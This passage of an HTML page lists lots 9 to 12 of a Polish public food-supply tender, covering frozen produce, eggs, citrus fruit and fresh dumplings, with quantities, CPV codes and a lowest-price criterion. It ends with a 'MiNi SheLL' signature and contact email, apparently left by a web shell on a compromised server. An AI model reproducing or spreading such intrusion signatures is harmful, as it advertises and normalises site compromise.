Skrzydełka drobiowe	kg.	100
Skrzydła z indyka	kg.	50
Udka drobiowe	kg.	1600
Wątróbki drobiowe	kg.	100
Żołądki drobiowe	kg.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Produkty głęboko mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz ukraiński	kg.	50
Brokuły (2,5 kg)	kg.	150
Brukselka	kg.	50
Bukiet warzyw (2,5 kg)	kg.	20
Fasolka zielona (2,5 kg)	kg.	100
Fasolka żółta (2,5 kg)	kg.	100
Flaki blanszowane 1kg	kg.	250
Frytki (2,5 kg)	kg.	100
Kalafior (2,5 kg)	kg.	160
Kluski parowane	kg.	200
Krokiety	kg.	100
Marchew kostka	kg.	100
Marchew z groszkiem (2,5 kg)	kg.	400
Mieszanka 6 składnikowa (2,5 kg)	kg.	50
Mieszanka kompotowa	kg.	50
Pierogi z serem	kg.	100
Porzeczka czarna	kg.	50
Pyzy z mięsem 	kg.	260
Pyzy ziemniaczane 	kg.	150
Szpinak (2,5 kg)	kg.	80
Tortilla	kg.	50
Truskawki (2,5 kg)	kg.	100
Warzywa na patelnie (2,5 kg)	kg.	300
Włoszczyzna (2,5 kg)	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Jaja..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja kurze ok.63 gram - 1 szt. ilośźć - 32000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Owoce cytrusowe, pieczarki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	kg.	1200
Brzoskwinie import	kg.	150
Cytryny	kg.	160
Kiwi	kg.	150
Mandarynki	kg.	250
Nektaryny	kg.	200
Pieczarki	kg.	300
Pomarańcze	kg.	600
Winogrona	kg.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wyroby garmażeryjne świeże..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kluchy parowane	kg.	500
Kopytka	kg.	400
Krokiety	kg.	200
Pierogi leniwe	kg.	400
Pierogi ruskie	kg.	600
Pierogi z kapustą	kg.	300
Pierogi z mięsem	kg.	300
Uszka	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com